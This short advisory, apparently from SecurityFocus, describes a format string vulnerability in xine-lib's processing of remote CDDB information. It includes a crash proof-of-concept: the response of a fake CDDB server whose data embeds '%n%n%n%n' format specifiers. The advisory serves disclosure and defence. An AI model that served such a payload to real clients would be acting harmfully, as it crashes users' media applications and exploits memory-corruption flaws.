|
Xine-Lib Remote CDDB Information Format String Vulnerability
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com A proof-of-concept exploit is available that causes a crash in affected applications. This is a fake CDDB server that returns the following data to clients: # %n%n%n%n DISCID=$2 DTITLE=Exploiters / Formatted and Stringed DYEAR=2005 DGENRE=Rock TTITLE0=Format TTITLE1=String TTITLE2=Bug EXTD= YEAR: 2005 EXTT0= EXTT1= EXTT2= PLAYORDER= |
|
 Privacy Statement |
